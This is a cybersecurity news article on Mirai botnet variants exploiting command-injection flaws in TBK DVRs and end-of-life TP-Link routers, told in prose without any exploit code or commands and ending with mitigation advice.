Mirai Botnet Variants Exploit Vulnerabilities in TBK DVRs and End-of-Life TP-Link Routers, Threatening IoT Security

Threat actors are actively exploiting critical security flaws in TBK Digital Video Recorders (DVRs) and older, unsupported TP-Link Wi-Fi routers to propagate sophisticated variants of the notorious Mirai botnet. This ongoing campaign, detailed by researchers at Fortinet’s FortiGuard Labs and Palo Alto Networks’ Unit 42, highlights the persistent dangers posed by insecure Internet of Things (IoT) devices and the evolving tactics of cybercriminals. The primary malware identified in these attacks is a Mirai variant dubbed "Nexcorium," which leverages known vulnerabilities to infiltrate devices, establish persistence, and launch devastating Distributed Denial-of-Service (DDoS) attacks.

Exploitation of TBK DVRs and the Rise of Nexcorium

The current wave of attacks specifically targets TBK DVR devices by exploiting CVE-2024-3721, a medium-severity command injection vulnerability. This flaw, with a Common Vulnerability Scoring System (CVSS) score of 6.3, affects models TBK DVR-4104 and DVR-4216. Researchers have observed threat actors using this vulnerability to gain unauthorized access and deploy the Nexcorium malware.

Vincent Li, a security researcher cited in the findings, emphasized the inherent risks associated with IoT devices: "IoT devices are increasingly prime targets for large-scale attacks due to their widespread use, lack of patching, and often weak security settings. Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks."

The exploitation process typically begins with the successful injection of a downloader script via the compromised CVE-2024-3721 vulnerability. This script then dynamically downloads and executes the Nexcorium botnet payload, tailored to the specific architecture of the compromised Linux system. Upon successful execution, the malware displays a chilling message: "nexuscorp has taken control," signaling a successful infiltration by the threat actor.

Fortinet’s analysis reveals that Nexcorium shares a common architectural foundation with other Mirai variants. Key features include an XOR-encoded configuration table initialization, a watchdog module designed to maintain the malware’s presence, and a robust DDoS attack module. This modular design allows the botnet to be highly adaptable and effective in its malicious operations.

A History of Exploitation and Evolving Threats

The exploitation of CVE-2024-3721 is not a novel occurrence. Over the past year, this particular vulnerability has served as an entry point for multiple malicious campaigns. Previously, it was observed being used to deploy other Mirai variants as well as a relatively new botnet known as RondoDox.

In September 2025, cybersecurity firm CloudSEK shed light on a large-scale "loader-as-a-service" botnet infrastructure that was actively distributing RondoDox, Mirai, and Morte payloads. This operation demonstrated a multi-pronged approach to infection, utilizing weak default credentials and exploiting legacy vulnerabilities in routers, IoT devices, and enterprise applications. The continued reliance on these known exploits underscores a critical gap in IoT device security management.

Nexcorium’s Arsenal: Exploits and Brute-Force Capabilities

Beyond its primary exploitation vector, Nexcorium is equipped with additional tools to expand its reach and enhance its capabilities. The malware includes an exploit for CVE-2017-17215, a known vulnerability affecting Huawei HG532 devices. This allows Nexcorium to further compromise other vulnerable devices within the same network, effectively turning compromised systems into launching pads for broader infection.

Furthermore, Nexcorium incorporates a comprehensive list of hard-coded usernames and passwords. This list is systematically used in brute-force attacks, primarily targeting the Telnet protocol on newly discovered victim hosts. By attempting to establish a Telnet connection with these credentials, attackers aim to gain direct shell access to the compromised device.

Upon a successful Telnet login, the malware proceeds to establish persistence by manipulating the system’s crontab and creating systemd services. This ensures that the botnet remains active even after reboots. Following persistence, Nexcorium connects to an external command-and-control (C2) server to await instructions for launching various types of DDoS attacks, including those leveraging UDP, TCP, and SMTP protocols. To evade detection and analysis, once persistence is successfully established, the malware diligently removes the original downloaded binary.

Fortinet’s assessment highlights Nexcorium’s adherence to modern IoT botnet characteristics: "The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems. Its use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and efficacy in increasing its infection reach."

Exploitation Attempts on End-of-Life TP-Link Routers

Concurrently, Palo Alto Networks’ Unit 42 has reported on active, automated scanning and probing activities targeting end-of-life (EoL) TP-Link wireless routers. These attacks specifically aim to exploit CVE-2023-33538, a command injection vulnerability with a higher CVSS score of 8.8. While the observed exploitation attempts were flawed and did not result in successful compromises, the underlying vulnerability remains a significant concern.

"Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real," stated researchers Asher Davila, Malav Vyas, and Chris Navarrete. "Successful exploitation requires authentication to the router’s web interface." This implies that while automated scans might be unsuccessful, targeted attacks with valid credentials could potentially lead to a successful compromise.

The severity of CVE-2023-33538 was recognized by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which added it to its Known Exploited Vulnerabilities (KEV) catalog in June 2025. This inclusion mandates federal agencies to patch or mitigate the vulnerability on their systems. The vulnerability affects several TP-Link models, underscoring the broad potential impact.

The malware associated with these attempted exploits on TP-Link routers exhibits characteristics similar to Mirai, with source code references to the string "Condi." This malware variant also possesses the capability to update itself with newer versions and can function as a web server, actively seeking to infect other devices that connect to it.

The Persistent Threat of Unpatched and Unsupported Devices

The repeated exploitation of vulnerabilities in both TBK DVRs and EoL TP-Link routers underscores a critical and ongoing challenge in cybersecurity: the proliferation of insecure IoT devices. Many of these devices, once deployed, are rarely updated, if at all. Manufacturers often cease providing security patches for older models, leaving them permanently vulnerable to known exploits.

The researchers’ advice to users of affected TP-Link devices is stark and practical: "Given that the affected TP-Link devices are no longer actively supported, users are advised to replace them with a newer model and ensure that default credentials are not used." This recommendation reflects the industry-wide understanding that relying on unsupported hardware is a significant security risk.

Unit 42 further elaborated on the systemic issues: "For the foreseeable future, the security landscape will continue to be shaped by the persistent risk of default credentials in IoT devices. These credentials can turn a limited, authenticated vulnerability into a critical entry point for determined attackers." This highlights that even seemingly minor security oversights, such as weak default passwords, can be amplified into catastrophic security breaches when combined with exploitable vulnerabilities.

Broader Implications for IoT Security

The findings from Fortinet and Palo Alto Networks serve as a stark reminder of the evolving threat landscape for IoT devices. As the number of connected devices continues to surge, so too does the attack surface available to cybercriminals. Botnets like Mirai, and its newer variants such as Nexcorium, are highly effective because they can weaponize a vast number of insecure devices, turning them into a distributed arsenal for launching disruptive and damaging cyberattacks.

The implications of these ongoing attacks are far-reaching. DDoS attacks can cripple businesses, disrupt critical infrastructure, and compromise online services. The compromised devices themselves can become part of a larger criminal enterprise, used for further malicious activities such as spam distribution, credential stuffing, or even as stepping stones for more sophisticated network intrusions.

The reliance on known exploits, combined with brute-force techniques, demonstrates a pragmatic and opportunistic approach by threat actors. They are not necessarily seeking novel vulnerabilities but are efficiently exploiting existing weaknesses that remain unaddressed in a significant portion of the global IoT ecosystem.

Recommendations for Mitigation and Future Security

The ongoing exploitation of these vulnerabilities necessitates a multi-faceted approach to mitigation. For end-users and organizations, immediate steps should include:

• Inventory and Audit: Regularly identify all connected IoT devices within a network and audit their security posture.
• Patching and Updates: Ensure all devices are running the latest firmware and security patches. For devices no longer supported by the manufacturer, prioritize replacement.
• Change Default Credentials: Always change default usernames and passwords to strong, unique credentials. Implement multi-factor authentication where possible.
• Network Segmentation: Isolate IoT devices on a separate network segment to limit the potential lateral movement of malware in case of a compromise.
• Firewall Rules: Configure firewalls to block unnecessary inbound and outbound connections to and from IoT devices.
• Security Awareness: Educate users about the risks associated with IoT devices and the importance of secure configuration.

For manufacturers, the challenge lies in designing and maintaining secure products throughout their lifecycle. This includes:

• Secure-by-Design: Incorporating security considerations from the initial stages of product development.
• Long-Term Support: Committing to providing security updates and patches for a reasonable period after a product’s release.
• Vulnerability Disclosure Programs: Establishing clear channels for security researchers to report vulnerabilities.

The persistent threat posed by Mirai variants and other IoT-focused botnets underscores the critical need for a more robust and proactive approach to IoT security. As the digital landscape continues to evolve, so too must our defenses to protect against the ever-present dangers lurking within our connected environments. The exploitation of legacy vulnerabilities serves as a constant reminder that neglecting the security of older devices can have severe and widespread consequences.